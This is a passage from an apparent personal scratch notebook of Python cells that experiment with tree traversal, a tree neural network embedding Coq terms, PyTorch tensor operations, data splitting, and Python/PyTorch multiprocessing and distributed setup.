# don't do anything if root is Nothing, else traverse according to PostOrder traversal
# (i.e. left & right until done then print)
if root: # if it's None it's False so does nothing, it's true if it's not None
        # first traverse the left subtree (if root.left is None this does nothing)
        print_postorder(root.left)
        # then traverse the right subtree (if root.right is None this does nothing)
        print_postorder(root.right)
        # only after both subtrees have been printed, print the current node's data
        print(root.val)
root = Node(1)
root.left = Node(2)
root.right = Node(3)
root.left.left = Node(4)
root.left.right = Node(5)
print("\nPostorder traversal of binary tree is")
print_postorder(root)
# %%
class Node:
"""Node class for general trees"""
def __init__(self, val):
self.children = []
self.val = val # value of current node
def forward(self, children_embeddings):
# just do a sum of children and current value
return self.val + sum(children_embeddings)
# create top
root = Node(1)
# create left
left = Node(2)
left.children = [Node(4), Node(5)]
# create right
right = Node(3)
# create entire tree
root.children = [left, right]
# A function to do postorder tree traversal
def compute_embedding_bottom_up(root, verbose=False):
'''
What we want is to compute all subtrees
@param root:
@return:
'''
# don't do anything if root is Nothing, else traverse according to PostOrder traversal
if root: # if it's None it's False so does nothing, it's true if it's not None
        # traverse all the children in post-order before continuing
        children_embeddings = []
        for child in root.children:
            child_embedding = compute_embedding_bottom_up(child, verbose)
            children_embeddings.append(child_embedding)
        # after all children have been computed (post-order), compute the current node's embedding
        root_embedding = root.forward(children_embeddings)
        print(root_embedding) if verbose else None
        return root_embedding
# should print 4 5 11 3 15
compute_embedding_bottom_up(root, verbose=True)
# %%
class Node:
"""Node class for general trees"""
def __init__(self, val):
self.children = []
self.val = val # value of current node
def forward(self, children_embeddings):
# just do a sum of children and current value
return self.val + sum(children_embeddings)
term = {
"App": [
{
"Ind": [
"Coq.Relations.Relation_Operators.clos_refl_trans",
"0"
]
},
{
"Var": [
"A"
]
},
{
"Var": [
"R"
]
}
]
}
def embed():
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
torch.manual_seed(1)
word_to_ix = {"hello": 0, "world": 1}
embeds = nn.Embedding(2, 5) # 2 words in vocab, 5 dimensional embeddings
print(type(embeds))
lookup_tensor = torch.tensor([word_to_ix["hello"]], dtype=torch.long)
hello_embed = embeds(lookup_tensor)
print(hello_embed)
# %%
import torch
x = torch.randn(5, 1)
print(x.size())
xs = torch.stack([x, x, x])
print(xs)
print(xs.size())
mean_xs = xs.mean(dim=0)
print(mean_xs)
# %%
'''
Need:
- 1 vocabulary of green terms
- 2 vocabulary of black terms (coq/gallina constructs)
- 3 ast trees so we can traverse them (postorder ideally)
- 4 traversal code for generating a embedding using tree_nn
'''
# import numpy as np
import torch
import torch.nn as nn
from collections import OrderedDict
# import torch.nn.functional as F
# import torch.optim as optim
# from torch.utils.data import DataLoader
# from torch.utils import data
class TreeNN(torch.nn.Module):
def __init__(self, vocab, embed_dim, constructors):
"""
vocab = [idx:word]
"""
super().__init__()
        # arity-0 symbols (the leaves / vocab words) are embeddings/vectors
self.vocab = vocab
self.embed_dim = embed_dim
self.vocab_2_idx = {word: idx for idx, word in enumerate(vocab)} # e.g. {"hello": 0, "world": 1}
self.embeds = nn.Embedding(len(self.vocab), embed_dim) # V words in vocab, D size embedding
# arity k are FNN
self.constructors = constructors
self.cons_2_fnn = {}
for cons in self.constructors:
fnn = self.get_cons_fnn()
self.cons_2_fnn[cons] = fnn
def forward(self, asts):
"""compute embeddings bottom up, so all the children of the ast have to be computed first"""
# ast = asts[0]
# embeds = [self.compute_embedding_bottom_up(ast) for ast in asts]
# return embeds
ast = asts
return self.compute_embedding_bottom_up(ast)
def compute_embedding_bottom_up(self, ast):
children_embeddings = []
for child in ast.children:
if child in self.vocab:
lookup_tensor = torch.tensor([self.vocab_2_idx[child]], dtype=torch.long)
child_embed = self.embeds(lookup_tensor)
else:
child_embed = self.compute_embedding_bottom_up(child)
children_embeddings.append(child_embed)
embed = torch.stack(children_embeddings, dim=0).mean(dim=0)
cons_fnn = self.cons_2_fnn[ast.val]
return cons_fnn(embed)
def get_cons_fnn(self):
# TODO improve, check if arity is variable or fixed, what NN to choose?
fnn = nn.Sequential(OrderedDict([
('fc0', nn.Linear(in_features=self.embed_dim, out_features=self.embed_dim)),
('SeLU0', nn.SELU()),
('fc1', nn.Linear(in_features=self.embed_dim, out_features=self.embed_dim))
]))
return fnn
class Node:
"""Node class for general trees"""
def __init__(self, val):
self.children = []
self.val = val # value of current node
def __repr__(self):
self.print_post_order()
return ''
def print_post_order(self):
"""print all the children first then the current node last"""
for child in self.children:
if type(child) is str:
print(child)
else:
child.print_post_order()
print(self.val)
class JsonToAst:
def __init__(self):
self.base_cases = {"Ind", "Var"}
def generate_ast(self, term):
'''
Assumption is that at term is of the form:
term = {
cons: [...,term,...]
}
base case:
term = {
cons: [...,string,...]
}
'''
for cons, args in term.items():
root = Node(cons)
if cons in self.base_cases:
args = args[0] # TODO ask lasse what to do here
root.children = [args]
else:
for term in args:
child = self.generate_ast(term)
root.children.append(child)
return root
####
def test():
json2ast = JsonToAst()
term = {
"App": [
{
"Ind": [
"Coq.Relations.Relation_Operators.clos_refl_trans",
"0"
]
},
{
"Var": [
"A"
]
},
{
"Var": [
"R"
]
}
]
}
ast = json2ast.generate_ast(term)
print(ast)
#
vocab = ["R", "A", "Coq.Relations.Relation_Operators.clos_refl_trans"]
constructors = ["App", "Ind", "Var"]
#
embed_dim = 4
term_encoder = TreeNN(vocab, embed_dim, constructors)
term_embedding = term_encoder(ast)
print(term_embedding)
print(term_embedding.size())
if __name__ == '__main__':
test()
print('done\a')
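# %%
# side note (my own sketch, not part of the TreeNN above): storing sub-modules in a plain python dict
# like cons_2_fnn means their parameters are NOT registered with the parent nn.Module, so
# .parameters() (and hence any optimizer built from it) silently misses them; nn.ModuleDict registers them.
import torch.nn as nn

class TinyTreeEncoder(nn.Module):
    def __init__(self, constructors, embed_dim=4):
        super().__init__()
        self.cons_2_fnn = nn.ModuleDict({cons: nn.Linear(embed_dim, embed_dim) for cons in constructors})

enc = TinyTreeEncoder(["App", "Ind", "Var"])
print(len(list(enc.parameters())))  # 6: one weight and one bias per constructor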
# %%
import torch
x = torch.randn(4, 3, 2)
xs = torch.cat([x, x, x], dim=0)
print(xs.size())
xs = torch.cat([x, x, x], dim=1)
print(xs.size())
xs = torch.cat([x, x, x], dim=2)
print(xs.size())
# %%
term = {
"App": [
{
"Ind": [
"Coq.Relations.Relation_Operators.clos_refl_trans",
"0"
]
},
{
"Var": [
"A"
]
},
{
"Var": [
"R"
]
}
]
}
print(term.keys())
keys = list(term.keys())
print(keys[0])
# %%
# python conditional ternary operator
x = 'true' if True else 'false'
# %%
import torch
x = torch.randn([5, 12])
print(x.mean())
print(x.mean().size())
y = torch.tensor(x)  # note: this copies but warns; x.clone().detach() is the recommended way to copy a tensor
print(y.size())
# %%
# https://discuss.pytorch.org/t/identity-element-for-stack-operator-torch-stack-emtpty-x-x-empty-tensor-exists/111459
import torch
empty = torch.tensor([])
x = torch.randn(3, 5, 7)
print(torch.cat([empty, x], dim=0).size())  # works: cat with an empty tensor is a no-op along dim 0
try:
    print(torch.stack([empty, x], dim=0).size())
except RuntimeError as e:
    # stack needs all tensors to have the same shape, so the empty tensor is NOT an identity for stack
    print(f'stack failed: {e}')
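# a possible workaround (my own sketch, not necessarily what the linked thread suggests): an empty
# tensor whose trailing dims match is an identity for cat along dim 0, so "stack onto an empty
# accumulator" can be emulated by unsqueezing each element first
acc = torch.empty(0, 3, 5, 7)
acc = torch.cat([acc, x.unsqueeze(0)], dim=0)
acc = torch.cat([acc, x.unsqueeze(0)], dim=0)
print(acc.size())  # torch.Size([2, 3, 5, 7])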
# %%
import torch
x = torch.randn(5, 4)
for layer in range(x.size(1)):
print(f'{layer=}')
# %%
# selecting indices arbitrarily, i.e. x[*, indices, *] where * denotes that the other dimensions are kept as-is
# here: keep every column except the last one (e.g. to later average only the first L-1 "layers")
x = torch.randn(5, 4)
# select the first L-1 columns
L = x.size(1)
indices = torch.tensor(range(L - 1))
xx = x.index_select(dim=1, index=indices)
print(f'{x=}')
print(f'{xx=}')
print(xx.size())
# %%
import torch
def ned_torch(x1, x2, dim=1, eps=1e-4):
"""
Normalized eucledian distance in pytorch.
https://discuss.pytorch.org/t/how-does-one-compute-the-normalized-euclidean-distance-similarity-in-a-numerically-stable-way-in-a-vectorized-way-in-pytorch/110829
https://stats.stackexchange.com/questions/136232/definition-of-normalized-euclidean-distance/498753?noredirect=1#comment937825_498753
:param x1:
:param x2:
:param dim:
:param eps:
:return:
"""
ned_2 = 0.5 * ((x1 - x2).var(dim=dim) / (x1.var(dim=dim) + x2.var(dim=dim) + eps))
return ned_2 ** 0.5
out1 = torch.tensor([[-3.6291e-01],
[-1.7674e+00],
[-2.1817e+00],
[-2.0127e+00],
[-1.6210e+00],
[-7.1149e-01],
[-8.0512e-01],
[-3.3430e-01],
[-6.6400e-01],
[-8.5222e-01],
[-1.1699e+00],
[-8.9726e-01],
[-7.2273e-02],
[-4.6621e-01],
[-1.7938e+00],
[-2.1175e+00],
[-1.2470e+00],
[-1.5756e-01],
[-6.4363e-01],
[-6.0576e-01],
[-1.6676e+00],
[-1.9971e+00],
[-5.9432e-01],
[-3.4780e-01],
[-6.0348e-01],
[-1.7820e+00],
[-2.2057e-01],
[-3.8268e-02],
[-1.5633e+00],
[-3.5840e-01],
[-5.7379e-02],
[-2.5210e-01],
[-1.9601e+00],
[-3.7318e-01],
[1.2341e-02],
[-2.2946e+00],
[-5.3198e-01],
[-2.3140e+00],
[-1.6823e+00],
[-4.7436e-01],
[-2.6047e-01],
[-2.1642e+00],
[-4.7522e-01],
[-5.7305e-01],
[2.8821e-01],
[-2.7846e-01],
[-2.5561e-01],
[-2.2448e+00],
[-1.1109e-02],
[-1.6171e+00],
[-2.3253e+00],
[-1.8158e+00],
[-1.5101e+00],
[1.1949e-01],
[-1.2281e+00],
[-4.2565e-01],
[-1.0244e+00],
[-2.0581e+00],
[-1.0552e+00],
[2.5954e-01],
[2.7600e-01],
[-1.2441e+00],
[2.5143e-01],
[-1.9237e+00],
[-2.0799e+00],
[-2.0188e+00],
[-1.2017e-01],
[-2.0858e+00],
[-1.4656e+00],
[-2.4549e-01],
[-2.3728e+00],
[-8.0225e-01],
[-4.2496e-01],
[-8.0095e-01],
[4.3450e-01],
[3.3060e-01],
[-2.1804e+00],
[-1.8725e+00],
[-1.2165e+00],
[-1.9400e+00],
[-2.2042e+00],
[-1.8880e+00],
[-1.2850e+00],
[1.2322e-01],
[-4.6162e-01],
[-8.0890e-01],
[-7.8389e-01],
[-2.1397e+00],
[4.1263e-01],
[-2.2107e+00],
[2.4144e-01],
[-3.8620e-01],
[-2.1676e+00],
[3.2484e-02],
[-1.6298e+00],
[-1.6220e+00],
[-1.3770e+00],
[-2.1185e+00],
[-1.1192e+00],
[-1.3630e+00],
[-4.5632e-01],
[-1.8549e+00],
[3.4460e-01],
[-2.3489e-01],
[-2.1207e+00],
[-7.0951e-01],
[2.8363e-01],
[-1.1481e+00],
[-5.5500e-01],
[-1.9301e+00],
[-1.2247e+00],
[-5.3754e-01],
[-5.6930e-01],
[2.5710e-01],
[-1.5921e+00],
[2.5347e-01],
[1.0652e-01],
[-1.1256e+00],
[-1.4893e+00],
[4.2699e-01],
[-9.1180e-01],
[-9.7470e-01],
[-1.1939e+00],
[3.5195e-01],
[-2.1075e+00],
[-1.5541e-01],
[-2.3053e+00],
[-2.2581e+00],
[-1.4817e+00],
[-4.7145e-01],
[1.5247e-01],
[7.7248e-02],
[-2.1716e+00],
[-4.0977e-01],
[-7.6577e-01],
[2.2840e-01],
[-1.9727e+00],
[-1.6670e+00],
[-1.7057e+00],
[-2.3080e+00],
[-4.0681e-01],
[1.0423e-03],
[-1.5651e+00],
[-5.2567e-01],
[-1.3016e+00],
[-1.6186e+00],
[-1.5546e+00],
[-1.7983e+00],
[1.1193e-01],
[-1.0648e+00]])
out2 = torch.tensor([[-0.2625],
[0.5472],
[0.7860],
[0.6886],
[0.4628],
[-0.0615],
[-0.0075],
[-0.2790],
[-0.0889],
[0.0196],
[0.2027],
[0.0456],
[-0.4300],
[-0.2029],
[0.5624],
[0.7491],
[0.2472],
[-0.3808],
[-0.1006],
[-0.1225],
[0.4897],
[0.6796],
[-0.1291],
[-0.2712],
[-0.1238],
[0.5556],
[-0.3445],
[-0.4496],
[0.4295],
[-0.2651],
[-0.4386],
[-0.3263],
[0.6583],
[-0.2565],
[-0.4788],
[0.8512],
[-0.1650],
[0.8623],
[0.4981],
[-0.1982],
[-0.3215],
[0.7760],
[-0.1977],
[-0.1413],
[-0.6378],
[-0.3111],
[-0.3243],
[0.8224],
[-0.4653],
[0.4606],
[0.8688],
[0.5751],
[0.3989],
[-0.5406],
[0.2363],
[-0.2263],
[0.1189],
[0.7148],
[0.1367],
[-0.6213],
[-0.6308],
[0.2456],
[-0.6166],
[0.6373],
[0.7274],
[0.6922],
[-0.4024],
[0.7307],
[0.3732],
[-0.3302],
[0.8962],
[-0.0092],
[-0.2267],
[-0.0099],
[-0.7222],
[-0.6623],
[0.7853],
[0.6078],
[0.2296],
[0.6467],
[0.7990],
[0.6167],
[0.2691],
[-0.5427],
[-0.2056],
[-0.0054],
[-0.0198],
[0.7618],
[-0.7096],
[0.8028],
[-0.6109],
[-0.2490],
[0.7779],
[-0.4904],
[0.4679],
[0.4634],
[0.3221],
[0.7496],
[0.1735],
[0.3141],
[-0.2086],
[0.5977],
[-0.6703],
[-0.3363],
[0.7509],
[-0.0627],
[-0.6352],
[0.1902],
[-0.1517],
[0.6410],
[0.2344],
[-0.1618],
[-0.1435],
[-0.6199],
[0.4461],
[-0.6178],
[-0.5331],
[0.1772],
[0.3869],
[-0.7178],
[0.0540],
[0.0902],
[0.2166],
[-0.6746],
[0.7433],
[-0.3821],
[0.8573],
[0.8301],
[0.3825],
[-0.1999],
[-0.5596],
[-0.5162],
[0.7803],
[-0.2355],
[-0.0302],
[-0.6034],
[0.6656],
[0.4893],
[0.5117],
[0.8589],
[-0.2372],
[-0.4723],
[0.4306],
[-0.1686],
[0.2787],
[0.4614],
[0.4245],
[0.5650],
[-0.5362],
[0.1421]])
x1 = out1
x2 = out2
print(x1.isnan().any())
print(x2.isnan().any())
dim = 1
eps = 1e-4
diff = (x1 - x2).var(dim=dim)
print(diff.isnan().any())
ned_2 = 0.5 * ((x1 - x2).var(dim=dim) / (x1.var(dim=dim) + x2.var(dim=dim) + eps))
ned = ned_2 ** 0.5
print(ned)
# conclusion, if you only have 1 number calling .var will result in nan since 1 number doesn't have a variance.
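# quick check of that conclusion (my own sketch): each row above has a single element, so the
# unbiased variance over dim=1 is 0/0 -> nan; unbiased=False gives 0 instead, and for [N, 1]
# outputs it makes more sense to take the statistics over the batch dimension (dim=0)
t = torch.tensor([[1.0], [2.0]])
print(t.var(dim=1))                  # tensor([nan, nan])
print(t.var(dim=1, unbiased=False))  # tensor([0., 0.])
print(ned_torch(out1, out2, dim=0))  # no nan when computed across the batch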
# %%
import torch
x = torch.randn(5, 4)
print(x.isnan().any())
# %%
from argparse import Namespace
# The 2 initial objects
options_foo = Namespace(foo="foo")
options_bar = Namespace(bar="bar")
# The vars() function returns the __dict__ attribute to values of the given object e.g {field:value}.
print(vars(options_foo))
# the merged object
options_baz = Namespace(**vars(options_foo), **vars(options_bar))
print(options_baz)
# %%
import torch
x = torch.randn(5, 4)
print(x.var(dim=1).size() == torch.Size([5]))
# %%
# pretty printing dictionaries and dicts of tensors
def _to_json_dict_with_strings(dictionary):
"""
Convert dict to dict with leafs only being strings. So it recursively makes keys to strings
if they are not dictionaries.
Use case:
- saving dictionary of tensors (convert the tensors to strins!)
- saving arguments from script (e.g. argparse) for it to be pretty
e.g.
"""
if type(dictionary) != dict:
return str(dictionary)
d = {k: _to_json_dict_with_strings(v) for k, v in dictionary.items()}
return d
def to_json(dic):
import types
import argparse
if type(dic) is dict:
dic = dict(dic)
else:
dic = dic.__dict__
return _to_json_dict_with_strings(dic)
def save_to_json_pretty(dic, path, mode='w', indent=4, sort_keys=True):
import json
with open(path, mode) as f:
json.dump(to_json(dic), f, indent=indent, sort_keys=sort_keys)
def pprint_dic(dic):
"""
This pretty prints a json
@param dic:
@return:
Note: this is not the same as pprint.
"""
import json
    # make all keys strings recursively with their native str function
dic = to_json(dic)
# pretty print
# pretty_dic = json.dumps(dic, indent=4, sort_keys=True)
# print(pretty_dic)
print(json.dumps(dic, indent=4, sort_keys=True)) # only this one works...idk why
# return pretty_dic
def pprint_namespace(ns):
""" pretty prints a namespace """
pprint_dic(ns)
import torch
# import json # results in non serializabe errors for torch.Tensors
from pprint import pprint
dic = {'x': torch.randn(1, 3), 'rec': {'y': torch.randn(1, 3)}}
pprint_dic(dic)
pprint(dic)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
# get init
path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
ckpt = torch.load(path_2_init)
mdl = ckpt['f']
#
Din, Dout = 100, 1
mdl = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
# with torch.no_grad():
# mdl.fc1_l1.weight.fill_(2.0)
# mdl.fc1_l1.bias.fill_(2.0)
#
hook1 = SimilarityHook(mdl, "fc1_l1")
hook2 = SimilarityHook(mdl, "fc1_l1")
mdl.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 100
# size = 8
# start CCA comparison
lb, ub = -1, 1
with torch.no_grad():
for _ in range(iters):
x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
mdl(x)
d1 = hook1.distance(hook2)
d2 = hook1.distance(hook2, size=4)
d3 = hook1.distance(hook2, size=None)
print(f'{d1=}')
print(f'{d2=}')
print(f'{d3=}')
# %%
# https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html
# https://datascience.stackexchange.com/questions/15135/train-test-validation-set-splitting-in-sklearn
from sklearn.model_selection import train_test_split
# overall split 85:10:5
X = list(range(100))
y = list(range(len(X)))
# first do 85:15 then do 2:1 for val split
# shuffling is fine (the default shuffle=True); reproducibility comes from fixing random_state below
# shuffle = False  # shuffle: bool, default=True. Whether or not to shuffle the data before splitting. If shuffle=False then stratify must be None.
random_state = 1 # Controls the shuffling applied to the data before applying the split. Pass an int for reproducible output across multiple function calls.
test_size = 0.15
X_train, X_val_test, y_train, y_val_test = train_test_split(X, y, test_size=test_size, random_state=random_state)
print(len(X_train))
print(len(X_val_test))
# then 2/3 for val, 1/3 for test to get 10:5 split
test_size = 1.0 / 3.0
X_val, X_test, y_val, y_test = train_test_split(X_val_test, y_val_test, test_size=test_size, random_state=random_state)
print(len(X_val))
print(len(X_test))
# %%
# %%
"""
global interpreter lock
The mechanism used by the CPython (the canonical implementation of the Python PL)
interpreter to assure that only one thread executes Python bytecode at a time.
However, some extension modules, either standard or third-party,
are designed so as to release the GIL when doing computationally-intensive
tasks such as compression or hashing. Also, the GIL is always released when doing I/O.
Past efforts to create a “free-threaded” interpreter
(one which locks shared data at a much finer granularity)
have not been successful because performance suffered in the
common single-processor case. It is believed that overcoming this performance
issue would make the implementation much more complicated
and therefore costlier to maintain.
According to this post multiprocessing library is the right library to use (and not asyncio)
https://leimao.github.io/blog/Python-Concurrency-High-Level/
nice basic python mp tutorial: https://docs.python.org/3/library/multiprocessing.html
TODO:
- spawn vs fork: https://docs.python.org/3/library/multiprocessing.html#multiprocessing.Process.run
"""
# The multiprocessing package offers both local and remote concurrency,
# effectively side-stepping the Global Interpreter Lock by using subprocesses instead of threads.
# Due to this, the multiprocessing module allows the programmer
# to fully leverage multiple processors on a given machine.
# It runs on both Unix and Windows.
# from multiprocessing.context import Process
import os
import time
from multiprocessing import Process
from multiprocessing import Pool
# Ex1: compute a map in parallel
def f(x):
# time.sleep(1)
return x * x
def main1():
with Pool(5) as pool:
print(pool.map(f, [1, 2, 3, 4, 5]))
# Ex2: example of start and join
def f2(name):
print('hello', name)
def main2():
p = Process(target=f2, args=('bob',))
p.start()
p.join()
# Ex3: example of halting the line like in go and then continuing after everyone is done
def f3(arg):
print('--- Inside process ---')
print(f'args to f3 is {arg}!')
print('parent process:', os.getppid())
pid = os.getpid()
print(f'process started with pid={pid}')
time.sleep(1)
print(f'--- process done with pid={pid}')
print('--- Inside process ---')
def main3():
"""
Example of how to wait incorrectly (it will not work since it will start a process but not
start the next until the current one is done)
:return:
"""
print(f'main process pid {os.getpid()}')
num_processes = 4
processes = [Process(target=f3, args=('arg!',)) for _ in range(num_processes)]
for p in processes:
print()
print(p)
p.start()
print(f'starting from the main process (pid={os.getpid()}) process with pid {p.pid}')
p.join() # wrong!
print('main 3 done')
def main4():
"""
Example of how to wait correctly, it blocks for all processes but calls p.start() on all of them first
:return:
"""
print(f'main process pid {os.getpid()}')
num_processes = 4
processes = [Process(target=f3, args=('arg!',)) for _ in range(num_processes)]
for p in processes:
print()
print(p)
p.start()
print(f'starting from the main process (pid={os.getpid()}) process with pid {p.pid}')
# wait group! call join on all processes and block until they are all done
for p in processes:
p.join()
print('main 4 done')
# Ex5: wait group implementation (i.e. block until all process declare they are done)
def heavy_compute(args, secs=1):
time.sleep(secs)
def serial_code_blocking_wrong():
"""
Example of how to wait incorrectly (it will not work since it will start a process but not
start the next until the current one is done)
:return:
"""
num_processes = 4
processes = [Process(target=heavy_compute, args=('arg!',)) for _ in range(num_processes)]
for p in processes:
p.start()
p.join() # wrong!
def parallel_code_blocking_correctly():
    """
    Example of how to wait correctly: start all processes first, then join them all,
    so they run concurrently instead of one finishing before the next starts.
    :return:
    """
num_processes = 4
processes = [Process(target=heavy_compute, args=('arg!',)) for _ in range(num_processes)]
for p in processes:
p.start()
# wait group! call join on all processes and block until they are all done
for p in processes:
p.join()
def main5():
start = time.time()
serial_code_blocking_wrong()
print(f'serial (wrong) execution time = {time.time() - start}')
start = time.time()
parallel_code_blocking_correctly()
print(f'parallel execution time = {time.time() - start}')
    # the first should take ~4 seconds, the second ~1 second
if __name__ == '__main__':
start = time.time()
# main1()
# main2()
# main3()
# main4()
main5()
print(f'total execution time = {time.time() - start}')
print('Done with __main__!\a\n')
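# %%
# a small demo (my own sketch) of the GIL point above: CPU-bound work does not speed up with
# threads (bytecode execution is serialized by the GIL) but does with processes.
# exact timings depend on the machine and on the multiprocessing start method (fork vs spawn).
import time
from multiprocessing import Pool
from multiprocessing.pool import ThreadPool

def cpu_bound(n):
    s = 0
    for i in range(n):
        s += i * i
    return s

if __name__ == '__main__':
    work = [1_000_000] * 8
    for name, pool_cls in [('threads', ThreadPool), ('processes', Pool)]:
        start = time.time()
        with pool_cls(4) as pool:
            pool.map(cpu_bound, work)
        print(f'{name}: {time.time() - start:.2f}s')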
# %%
"""
Goal: train in a mp way by computing each example in a separate process.
tutorial: https://pytorch.org/docs/stable/notes/multiprocessing.html
full example: https://github.com/pytorch/examples/blob/master/mnist_hogwild/main.py
Things to figure out:
    - fork or spawn for us? see pytorch but see this too https://docs.python.org/3/library/multiprocessing.html#multiprocessing.Process.run
    - shared memory
    - do we need num_workers=0, 1 or 2? (one for the main thread, the other for pre-fetching batches)
    - run a test and check that the 112 processes do improve the time for a loop (add a progress bar for the dataloader)
docs: https://pytorch.org/docs/stable/multiprocessing.html#module-torch.multiprocessing
(original python mp, they are compatible: https://docs.python.org/3/library/multiprocessing.html)
"""
# from datetime import time
#
# import torch
# from torch.multiprocessing import Pool
#
#
# def train(cpu_parallel=True):
# num_cpus = get_num_cpus()  # 112 is the plan for intel's cluster, as an argparse arg or function
# model.shared_memory() # TODO do we need this?
# # add progressbar for data loader to check if multiprocessing is helping
# for batch_idx, batch in dataloader:
# # do this mellow with pool when cpu_parallel=True
# with Pool(num_cpus) as pool:
# losses = pool.map(target=model.forward, args=batch)
# loss = torch.sum(losses)
# # now do .step as normal
#
#
# if __name__ == '__main__':
# start = time.time()
# train()
# print(f'execution time: {time.time() - start}')
# %%
import torch
print(torch.multiprocessing.get_all_sharing_strategies())
print(torch.multiprocessing.get_sharing_strategy())
torch.multiprocessing.set_sharing_strategy('file_system')
# %%
# getting the id of the process wrt to the pooling: https://stackoverflow.com/questions/10190981/get-a-unique-id-for-worker-in-python-multiprocessing-pool
import multiprocessing
def f(x):
print(multiprocessing.current_process())
return x * x
p = multiprocessing.Pool()
print(p.map(f, range(6)))
# %%
import torch
import torch.nn as nn
from torch.utils.data import Dataset
from torch.multiprocessing import Pool
# class SimpleDataSet(Dataset):
#
# def __init__(self, D, num_examples=20):
# self.data = [torch.randn(D) for _ in range(num_examples)]
#
# def __len__(self):
# return len(self.data)
#
# def __getitem__(self, idx):
# return self.data[idx]
def main():
Din, Dout = 3, 1
model = nn.Linear(Din, Dout)
criterion = nn.MSELoss()
def get_loss(data_point):
x, y = data_point
y_pred = model(x)
loss = criterion(y_pred, y)
return loss
batch_size = 3
num_epochs = 10
num_batches = 5
num_procs = 5
for epoch in range(num_epochs):
for i in range(num_batches):
batch = [(torch.randn(Din), torch.randn(Dout)) for _ in range(batch_size)]
            # note: get_loss is a local function, which multiprocessing cannot pickle; the next cell
            # moves the loss function to module level, which is the more reliable approach
            with Pool(num_procs) as pool:
                losses = pool.map(get_loss, batch)
            loss = torch.stack(losses).mean()  # torch.avg does not exist; stack the per-example losses and average
            loss.backward()
if __name__ == '__main__':
main()
# %%
# counting number of processors: https://stackoverflow.com/questions/23816546/how-many-processes-should-i-run-in-parallel
# %%
# # List of tuples
# students = [('jack', 34, 'Sydeny', 'Australia'),
# ('Riti', 30, 'Delhi', 'India'),
# ('Vikas', 31, 'Mumbai', 'India'),
# ('Neelu', 32, 'Bangalore', 'India'),
# ('John', 16, 'New York', 'US'),
# ('Mike', 17, 'las vegas', 'US')]
# # Create DataFrame object from a list of tuples
# dfObj = pd.DataFrame(students, columns=['Name', 'Age', 'City', 'Country'], index=['a', 'b', 'c', 'd', 'e', 'f'])
# %%
"""
Goal: train in a mp way by computing each example in a separate process.
tutorial: https://pytorch.org/docs/stable/notes/multiprocessing.html
full example: https://github.com/pytorch/examples/blob/master/mnist_hogwild/main.py
Things to figure out:
    - fork or spawn for us? see pytorch but see this too https://docs.python.org/3/library/multiprocessing.html#multiprocessing.Process.run
    - shared memory
    - do we need num_workers=0, 1 or 2? (one for the main thread, the other for pre-fetching batches)
    - run a test and check that the 112 processes do improve the time for a loop (add a progress bar for the dataloader)
docs: https://pytorch.org/docs/stable/multiprocessing.html#module-torch.multiprocessing
(original python mp, they are compatible: https://docs.python.org/3/library/multiprocessing.html)
"""
# def train(cpu_parallel=True):
# num_cpus = get_num_cpus()  # 112 is the plan for intel's cluster, as an argparse arg or function
# model.shared_memory() # TODO do we need this?
# # add progressbar for data loader to check if multiprocessing is helping
# for batch_idx, batch in dataloader:
# # do this mellow with pool when cpu_parallel=True
# with Pool(num_cpus) as pool:
# losses = pool.map(target=model.forward, args=batch)
# loss = torch.sum(losses)
# # now do .step as normal
# https://github.com/pytorch/examples/blob/master/mnist/main.py
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import StepLR
from torch.utils.data import Dataset, DataLoader
from torch.multiprocessing import Pool
class SimpleDataSet(Dataset):
def __init__(self, Din, num_examples=23):
self.x_dataset = [torch.randn(Din) for _ in range(num_examples)]
# target function is x*x
self.y_dataset = [x ** 2 for x in self.x_dataset]
def __len__(self):
return len(self.x_dataset)
def __getitem__(self, idx):
return self.x_dataset[idx], self.y_dataset[idx]
def get_loss(args):
x, y, model = args
y_pred = model(x)
criterion = nn.MSELoss()
loss = criterion(y_pred, y)
return loss
def get_dataloader(D, num_workers, batch_size):
ds = SimpleDataSet(D)
dl = DataLoader(ds, batch_size=batch_size, num_workers=num_workers)
return dl
def train_fake_data():
num_workers = 2
Din, Dout = 3, 1
model = nn.Linear(Din, Dout).share_memory()
optimizer = torch.optim.Adam(model.parameters(), lr=0.1)
batch_size = 2
num_epochs = 10
# num_batches = 5
num_procs = 5
dataloader = get_dataloader(Din, num_workers, batch_size)
scheduler = StepLR(optimizer, step_size=1, gamma=0.7)
for epoch in range(num_epochs):
for _, batch in enumerate(dataloader):
batch = [(torch.randn(Din), torch.randn(Dout), model) for _ in batch]
            with Pool(num_procs) as pool:
                optimizer.zero_grad()
                losses = pool.map(get_loss, batch)
                loss = torch.stack(losses).mean()  # losses is a python list of tensors; torch.mean needs a tensor
                loss.backward()
                optimizer.step()
# scheduler
scheduler.step()
if __name__ == '__main__':
# start = time.time()
# train()
train_fake_data()
# print(f'execution time: {time.time() - start}')
# %%
"""
The distributed package included in PyTorch (i.e., torch.distributed) enables researchers and practitioners to
easily parallelize their computations across processes and clusters of machines.
As opposed to the multiprocessing (torch.multiprocessing) package, processes can use different communication backends
and are not restricted to being executed on the same machine.
https://pytorch.org/tutorials/intermediate/dist_tuto.html
"""
"""run.py:"""
# !/usr/bin/env python
import os
import torch
import torch.distributed as dist
from torch.multiprocessing import Process
def run(rank, size):
"""
Distributed function to be implemented later.
This is the function that is actually ran in each distributed process.
"""
pass
def init_process_and_run_parallel_fun(rank, size, fn, backend='gloo'):
"""
Initialize the distributed environment (for each process).
gloo: is a collective communications library (https://github.com/facebookincubator/gloo). My understanding is that
it's a library for process to communicate/coordinate with each other/master. It's a backend library.
"""
# set up the master's ip address so this child process can coordinate
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
# TODO: I think this is what makes sure that each process can talk to master,
dist.init_process_group(backend, rank=rank, world_size=size)
# run parallel function
fn(rank, size)
if __name__ == "__main__":
size = 2
processes = []
for rank in range(size):
# target is the function the (parallel) process will run with args
p = Process(target=init_process_and_run_parallel_fun, args=(rank, size, run))
p.start() # start process
processes.append(p)
